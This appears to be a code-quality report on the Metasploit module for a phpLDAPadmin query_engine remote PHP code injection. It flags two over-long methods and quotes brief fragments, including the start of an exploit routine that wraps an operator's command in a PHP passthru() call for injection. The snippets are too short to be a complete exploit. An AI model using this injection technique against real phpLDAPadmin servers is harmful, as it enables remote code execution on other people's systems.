modules/exploits/multi/http/phpldapadmin_query_engine.rb
Method initialize
has 39 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'phpLDAPadmin query_engine Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in the lib/functions.php for
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
# if we are using the exec CMD stager
# important to check which php functions are disabled
if datastore['CMD']
p = "passthru(\"%s\");" % datastore['CMD']